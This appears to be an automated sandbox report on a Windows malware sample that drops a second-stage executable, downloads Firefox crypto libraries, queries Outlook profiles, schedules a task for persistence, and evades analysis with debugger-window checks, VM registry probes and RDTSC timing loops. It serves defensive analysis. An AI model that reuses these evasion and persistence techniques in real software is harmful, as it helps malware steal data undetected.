Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: 1jPL5zru3u.exe Static file information: File size 2509824 > 1048576
Source: 1jPL5zru3u.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x221800
Source: Binary string: mozglue.pdbP source: 1jPL5zru3u.exe, 00000000.00000002.1889326037.000000006C43D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: 1jPL5zru3u.exe, 00000000.00000002.1889326037.000000006C43D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Source: C:\Users\user\Desktop\1jPL5zru3u.exe Unpacked PE file: 0.2.1jPL5zru3u.exe.cb0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Unpacked PE file: 6.2.CAEHDBAAEC.exe.530000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 10.2.explorti.exe.ba0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 11.2.explorti.exe.ba0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 13.2.explorti.exe.ba0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW;
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C42C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C42C410
Source: initial sample Static PE information: section where entry point is pointing to: .data
Source: explorti.exe.6.dr Static PE information: real checksum: 0x1d98f3 should be: 0x1d947d
Source: CAEHDBAAEC.exe.0.dr Static PE information: real checksum: 0x1d98f3 should be: 0x1d947d
Source: 1jPL5zru3u.exe Static PE information: real checksum: 0x0 should be: 0x27164b
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1d98f3 should be: 0x1d947d
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: ltpqnbtv
Source: amadka[1].exe.0.dr Static PE information: section name: vtlswbyt
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name:
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name: .idata
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name:
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name: ltpqnbtv
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name: vtlswbyt
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: explorti.exe.6.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name: .idata
Source: explorti.exe.6.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name: ltpqnbtv
Source: explorti.exe.6.dr Static PE information: section name: vtlswbyt
Source: explorti.exe.6.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3FB536 push ecx; ret 0_2_6C3FB549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BBD82C push ecx; ret 10_2_00BBD83F
Source: 1jPL5zru3u.exe Static PE information: section name: entropy: 7.9949641655914805
Source: 1jPL5zru3u.exe Static PE information: section name: entropy: 7.980309777125587
Source: 1jPL5zru3u.exe Static PE information: section name: entropy: 7.952939990721896
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.986751932687439
Source: amadka[1].exe.0.dr Static PE information: section name: ltpqnbtv entropy: 7.954413897969609
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name: entropy: 7.986751932687439
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name: ltpqnbtv entropy: 7.954413897969609
Source: explorti.exe.6.dr Static PE information: section name: entropy: 7.986751932687439
Source: explorti.exe.6.dr Static PE information: section name: ltpqnbtv entropy: 7.954413897969609
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\softokn3.dll

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4255F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C4255F0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 723E59 second address: 723E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 723E65 second address: 723E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71C2AD second address: 71C2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71C2B1 second address: 71C2B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71C2B5 second address: 71C2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 72505C second address: 725060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 725060 second address: 72506E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FB424542846h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 72506E second address: 72507A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 72507A second address: 725095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB42454284Eh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 725095 second address: 7250B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7250B5 second address: 7250B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 72517E second address: 725186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 725186 second address: 7251A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007FB42454284Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FB424542846h 0x00000016 rdtsc
